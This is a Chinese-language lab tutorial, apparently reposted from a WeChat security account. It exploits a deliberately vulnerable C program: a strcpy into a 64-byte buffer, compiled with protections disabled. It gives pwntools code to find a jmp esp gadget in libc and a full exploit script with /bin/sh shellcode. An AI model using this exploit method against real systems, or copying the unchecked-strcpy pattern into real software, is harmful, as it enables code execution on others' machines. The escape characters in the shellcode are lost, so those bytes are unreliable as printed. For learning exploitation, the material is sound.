栈溢出简单复现

admin 2023年5月18日13:56:57评论35 views字数 3156阅读10分31秒阅读模式


一、工具安装

pwntools工具安装

$ sudo apt-get update

$ sudo apt-get install python2.7 python-pip python-devgit libssl-dev libffi-dev build-essential

$ sudo pip install --upgrade pip

$ sudo pip install --upgrade pwntools

 

gcc/gdb安装

$ sudo apt-get install gcc/gdb

 

peda安装

$ git clone https://github.com/longld/peda.git ~/peda

$ echo "source ~/peda/peda.py" >>~/.gdbinit    

二、程序

源码文件名为:StackOF.c

#include <stdio.h>

#include <string.h>

 

void vul(char *msg)

{

    charbuffer[64];

    strcpy(buffer,msg);

    return;

}

 

int main()

{

   puts("Soplz give me your shellcode:");

   charbuffer[256];

   memset(buffer,0,256);

   read(0,buffer,256);

    vul(buffer);

   return 0;

}

可以看到,其是将main函数里的buffer作为msg传入vul函数里,然后拷贝到vul中的buffer,但是main函数中buffer大小为256,而vul函数中buffer的大小为64,这就是问题所在。

为了调试方便把保护操作关闭

gcc编译:gcc -m32 -no-pie-fno-stack-protector -z execstack -o pwnme StackOF.c

-m32:生成32位的可执行文件

-no-pie:关闭程序ASLR/PIE(程序随机化保护)

-fno-stack-protector:关闭Stack Protector/Canary(栈保护)

-z execstack:关闭DEP/NX(堆栈不可执行)

-o:输出

pwnme:编译生成文件的文件名

StackOF.c:编译前的源文件

栈溢出简单复现

尝试运行pwnme

栈溢出简单复现

观察分析所开启的漏洞缓解策略

栈溢出简单复现

最好加一条命令关闭系统的的地址随机化

echo 0 > /proc/sys/kernel/randomize_va_space

栈溢出简单复现

三、思路

由源码可知该栈溢出漏洞的原因是在调用strcpy之前未对源字符串的长度进行安全检查。结果就是用户输入过长时,会向高地址覆盖。

栈溢出简单复现

那我们可以布局成

栈溢出简单复现

假设jmp esp的地址为0x12345678,在运行到原返回地址位置也就是0x12345678时,会执行0x12345678处的指令,也就是jmp esp,同时esp会+4,这时esp就指向了shellcode的起始位置,jmp esp一执行,接下来就是执行shellcode,如图:

栈溢出简单复现

所以要构造的buffer = 填充字符 + jmp_esp +shellcode

四、具体解决分析

jmp esp咋整呢?这个我们可以去libc文件中查找(libc是个啥?),c编写的程序都要加载libc文件.

1.libc怎么找?

首先,我们先查看加载的libc文件是什么版本
打开gdb调试pwnme

栈溢出简单复现

直接在main函数上下断点

栈溢出简单复现

然后r运行,加载程序,在断点断下

栈溢出简单复现

输入 info sharedlibrary或i sharedlibrary

栈溢出简单复现

这个时候你就找到了(- _-)!!!

2.找到jmp esplibc中的地址:jmp_esp_addr_offset

很简单,上代码

from pwn import *

 

libc = ELF('/lib32/libc.so.6')                                #文件

jmp_esp = asm('jmp esp')                                      #jmp esp汇编指令的操作数

 

jmp_esp_addr_in_libc = libc.search(jmp_esp).next()            #搜索

 

print hex(jmp_esp_addr_in_libc)                               #打印

效果

栈溢出简单复现

但是!!!!这还没完,这个地址只是jmp esp在libc文件里的位置(也叫偏移地址,在最终代码将命名为jmp_esp_addr_offset),要知道其在程序里的地址还要加上libc在程序里的起始地址(也叫基址,在最终代码将命名为libc_base),所以jmp esp在程序里的地址 : jmp_esp_addr = jmp_esp_addr_offset+libc_base,结合图解一下

栈溢出简单复现

3.libc在程序里的地址:libc_base

输入指令LD_TRACE_LOADED_OBJECTS=1 ./pwnme可以得到加载

栈溢出简单复现

4.编写shellcode

通过调用系统调用获得shell
x31xc9xf7xe1xb0x0bx51x68x2fx2fx73x68x68x2fx62x69x6ex89xe3xcdx80

5.计算填充数据

寻找strcpy函数上面最后一个push edx,edx的值即为strcpy(buffer,msg)函数中buffer的起始地址(0xffffd190):

栈溢出简单复现

N单步步过,s单步步入,步过到retn:

栈溢出简单复现

Esp(0xffffd1dc)即为返回值,用0xffffd1dc-0xffffd190=76

最终代码

from pwn import *

 

p = process('./pwnme')                    #运行程序

p.recvuntil("shellcode:")                 #当接受到字符串'shellcode:'

 

#找jmp_esp_addr_offset,见本文第四节第二点

libc = ELF('/lib32/libc.so.6')             

jmp_esp = asm('jmp esp')

 

jmp_esp_addr_offset = libc.search(jmp_esp).next()

 

if jmp_esp_addr_offset is None:

    print 'Cannot findjmp_esp in libc'

else:

    printhex(jmp_esp_addr_offset)

 

libc_base = 0xf7dd1000                              #你找到的libc加载地址

jmp_esp_addr = libc_base + jmp_esp_addr_offset      #得到jmp_esp_addr

 

print hex(jmp_esp_addr)

 

#构造布局,本文第三节

buf = 'A'*76                                                    #如何得到填充数据大小:https://www.jianshu.com/p/278f8d1f8322

buf += p32(jmp_esp_addr)

buf +='x31xc9xf7xe1xb0x0bx51x68x2fx2fx73x68x68x2fx62x69x6ex89xe3xcdx80'

 

with open('poc','wb') as f:

    f.write(buf)

 

p.sendline(buf)                                               #发送构造后的buf

 

p.interactive()

效果

栈溢出简单复现


原文始发于微信公众号(CTS纵横安全实验室):栈溢出简单复现

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年5月18日13:56:57
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   栈溢出简单复现https://cn-sec.com/archives/873615.html

发表评论

匿名网友 填写信息